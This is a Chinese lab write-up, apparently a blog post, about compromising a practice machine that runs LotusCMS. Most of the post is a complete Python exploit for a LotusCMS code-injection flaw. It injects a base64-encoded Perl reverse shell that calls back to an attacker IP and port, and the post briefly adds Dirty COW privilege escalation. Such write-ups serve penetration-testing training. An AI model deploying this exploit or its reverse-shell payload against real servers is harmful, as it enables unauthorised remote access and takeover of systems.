靶机练习
1.通过对目标主机扫描发现80端口存在WEB
登录界面看到了lotusCMS
通过exploit搜索lotusCMS发现存在一个远程代码执行漏洞:https://www.exploit-db.com/exploits/18565.但是给到的EXP为msfconsole(之前讲过尽量不使用metasploit)可以直接利用,我们这里编写的exp来获取shell。
from requests import get
import re
import random
from urllib import parse
import base64
import threading
# 生成随机码
def gen_string():
key = ""
for i in range(10):
key += chr(random.randint(65,90))
return key
# 检查漏洞是否存在
def check(target):
if "http" not in target:
target = "http" + target
result = get(target)
find = re.search(r'<a.*href=[\'|"](/*index.php)\?.*(page=\w+)[\'|"].*>',result.text)
if find is None:
print("[*] INFO: Not fond vulnerability.")
return 0
key = gen_string()
target += "index.php?page=index');"+parse.quote("echo '"+key+"';//")
res = get(target)
if key in res.text:
print("[!] INFO: Find vul!!!")
return True
print("[*] INFO: Not fond vulnerability.")
return 0
def exp(target,host,port):
poc = """perl -e 'use Socket;$i="%s";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'""" %(host,port)
poc = base64.b64encode(poc.encode('utf-8'))
target += "index.php?page=index');"+parse.quote("system(base64_decode(%s));//" %poc)
print("[~] Confirm: please run 'nc -lvp %s' on your client" %port)
input("\t|--- Please enter any key to start!")
threading.Thread(target=get, args=(target,)).start()
print("[?] INFO: Get shell?")
print("[!] INFO: If the attack is successful,The thread is being requested to suspend……")
exit(0)
# target : please input target
# host : please input lhost
# port : please input lport
target = "http://192.168.29.133/"
host = "192.168.29.129"
port = "4444"
if check(target):
exp(target, host, port)
运行脚本:
此时kali运行nc进行监听,顺利获取到shell
提权
查看克提权的漏洞(使用的工具为inux-exploit-suggester)发现可以使用脏牛进行提权。
提权成功
使用ssh登录
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
